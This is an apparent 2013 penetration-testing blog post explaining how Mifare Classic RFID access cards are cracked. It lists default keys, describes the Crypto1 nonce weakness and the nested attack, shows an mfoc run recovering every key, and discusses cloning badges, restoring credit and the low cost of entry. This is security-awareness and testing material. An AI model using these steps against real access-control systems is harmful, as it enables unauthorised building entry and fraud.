Skip to content

Access Control – Part 2: Mifare Attacks

by on July 15, 2013

tiki

Introduction

Our previous posting on Access Control Part 1: Magstripes Revisited, demonstrated the use and subversion of magstripe technology. RFID is our future, and unless implemented in a secure fashion – it to can be vulnerable to attack.
Below we will walk through a valid attack methodology, including hardware and software, that can be used to subvert some RFID Access Control Systems.

The organisations that tend to be vulnerable are early adopters of the technology, and in some cases departments that have a fixed limited security budget?

Mifare Specification

Overview

One of the most used RFID cards (13.56MHz), based on ISO14443 A/B standard and uses the proprietary crypto1 algorithm with 48bit keys.  These cards are relativity cheap and cost approximately £1(GBP) each.

Technical Details

Below is a simplified depiction of the layout of a Mifare RFID card. I am only demonstrating the first 2 Sectors, as Sector 1 layout is typically repeated right down to Sector 15 (Mifare 1K card):

Sector Block  | 16 Byte Data Field          | Read/Write
---------------------------------------------
Sec 0 Block 0| UID | Manufacturer Data      | Read Only
Sec 0 Block 1| Mifare Application Directory | R/W
Sec 0 Block 2| Mifare Application Directory | R/W
Sec 0 Block 3| Key A |Permissions | Key B
---------------------------------------------
Sec 1 Block 0| Data                         | R/W
Sec 1 Block 1| Data                         | R/W
Sec 1 Block 2| Data                         | R/W
Sec 1 Block 3| Key A |Permissions | Key B
---------------------------------------------
...

Security Features

  • Read­-only Unique Identifier (UID)
  • Mutual authentication between reader and writer and encrypted communication
  • CRYPTO1 non­public algorithm implementation obfuscated parity information

default keys

Manufactures pre-load Mifare cards with default keys – these can be found within their design/specification documentation, below is a list of the most common default keys. These are extremely useful to know when trying to crack Mifare RFID cards:

  • 0x000000000000
  • 0xffffffffffff
  • 0xa0a1a2a3a4a5
  • 0xb0b1b2b3b4b5
  • 0x4d3a99c351dd
  • 0x1a982c7e459a
  • 0xd3f7d3f7d3f7
  • 0xaabbccddeeff

Crypto1 Weakness + LSFR

c1

No non-linear feedback

LSFR

The Linear Shift Feedback Registers have always received considerable attention in cryptography. Owing to the good statistical properties, large period and low implementation costs, LFSR have achieved wide acceptance in developing stream ciphers. LFSRs are notoriously insecure from a cryptographic standpoint because the structure of an n-bit LFSR can be easily deduced by observing 2n consecutive bits. Due to the inherent linearity, LFSR based stream ciphers are susceptible to several general attacks including fast correlation attack, algebraic attack, cache timing attack,known plaintext attack meet-in-the middle consistency attack, best affine approximation attack, and the derived sequence attack

  • pseudo random generation defined by the polynomial x^16 + x^14 + x^13 + x^11 + 1
  • length is 32 bits, but it has only 16 bits entropy! L16 = x0 XOR x11 XOR x13 XOR x14 XOR x16 Ar = suc2(Nt), At = suc3(Nt)
  • generated nonces can be predicted in the time

Recover Keys Using Nested Attack

  • Authenticate to Block X with a Default Key (above), read the Tag’s Nt (determined by LFSR)
  • Authenticate to same Block with same key and read Tag’s Nt’ (this is in an encrypted session)
  • Compute timing distance
  • Guess Nt value and authenticate to next Block

Tools

Hardware

Software

Android NFC Apps (Selection)

MFOC Example

Below is an example test-run of mfoc. One default sector key leads to the entire card becoming compromised!

$ mfoc -O out.mfd
Found MIFARE Classic 4K card with uid: 3b0e943f        
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [x..x....................................]
[Key: b0b1b2b3b4b5] -> [x..x....................................]
[Key: 000000000000] -> [x..x....................................]
[Key: 4d3a99c351dd] -> [x..x....................................]
[Key: 1a982c7e459a] -> [x..x....................................]
[Key: aabbccddeeff] -> [x..x....................................]

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
Sector 03 -  FOUND_KEY   [A]  Sector 03 -  UNKNOWN_KEY [B]  
Sector 04 -  UNKNOWN_KEY [A]  Sector 04 -  UNKNOWN_KEY [B]  
Sector 05 -  UNKNOWN_KEY [A]  Sector 05 -  UNKNOWN_KEY [B]  
Sector 06 -  UNKNOWN_KEY [A]  Sector 06 -  UNKNOWN_KEY [B]  
...

Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32797 .....
Sector: 1, type A, probe 1, distance 30241 .....
Sector: 1, type A, probe 2, distance 29435 .....
Found Key: A [1494e81663d7]                      
Sector: 16, type A, probe 21, distance 32837 .....
Sector: 16, type A, probe 22, distance 29443 .....
Sector: 16, type A, probe 23, distance 29433 .....
Sector: 16, type A, probe 24, distance 32843 .....
Found Key: A [6d59ee19b1c9]                       
Sector: 17, type A                                              
Sector: 4, type B, probe 0, distance 32799 .....  
Sector: 4, type B, probe 1, distance 32797 .....  
Sector: 4, type B, probe 2, distance 32803 .....  
Sector: 4, type B, probe 3, distance 29427 .....  
Found Key: B [a24c49684d8e]                       
Sector: 5, type B                                                      
Sector: 36, type B, probe 0, distance 32797 ..... 
Sector: 36, type B, probe 1, distance 32845 ..... 
Sector: 36, type B, probe 2, distance 31087 ..... 
Sector: 36, type B, probe 3, distance 32797 ..... 
Sector: 36, type B, probe 4, distance 29431 ..... 
Sector: 36, type B, probe 5, distance 29441 ..... 
Found Key: B [107913b22a00]                       
Sector: 37, type B, probe 0, distance 31137 ..... 
Sector: 37, type B, probe 1, distance 29437 ..... 
Sector: 37, type B, probe 2, distance 29431 ..... 
Sector: 37, type B, probe 3, distance 29441 ..... 
Found Key: B [6d4490b424d8]                       
Sector: 38, type B                                
Found Key: B [6d59ee19b1c9]                       
Sector: 39, type B                                
Found Key: B [6d59ee19b1c9]                       
Auth with all sectors succeeded, dumping keys to a file!
Block 255, type A, key 6d59ee19b1c9 :00  00  00  00  00  00  0f  00  ff  00  00  00  00  00  00  00  
Block 254, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 253, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 252, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 251, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 250, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
...

And the entire card is accessible.

Other Findings/Observations

A lot of Access Control Systems appear to store their data in Sector 14. This can be copied (cloned) to other mifare cards, or even manipulated to gain access to buildings/rooms/systems that were otherwise inaccessible 🙂

Considerations

Risks

  • Cloning
    • Once all keys are recovered, can clone entire card (Chinese magic mifare – clone UID(usually Read-Only field))
    • T5557 cards can potentially clone hardcoded UID
    • Proxmark 3 can clone card in emulation mode
  • Fraud
    • Restore previous credit

Cost of Attack

  • $40(USD) – tikitag / touchatag RFID reader/writer (sufficient for reading / cracking / writing / cloning Mifare Classic cards)
  • $400(USD) – Proxmark 3 (just for advanced RFID cracking)
  • £1 for blank 4kB Mifare Classic (can be bought on ebay.com from Taiwan/China)

At a minimum of $41(USD) / £30(GBP) I could potentially walk straight through your organisations front door!

3 Comments
  1. Spot on with this write-up, I actually think this site needs a lot
    more attention. I’ll probably be back again to read more,
    thanks for the advice!

  2. Fantastic Article. Thanks for posting this, it is incredibly clearly written and published.
    I will likely keep checking back for more posts from you.

Trackbacks & Pingbacks

  1. Access Control Part 3: Using the Big Guns! | Pentura Labs's Blog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: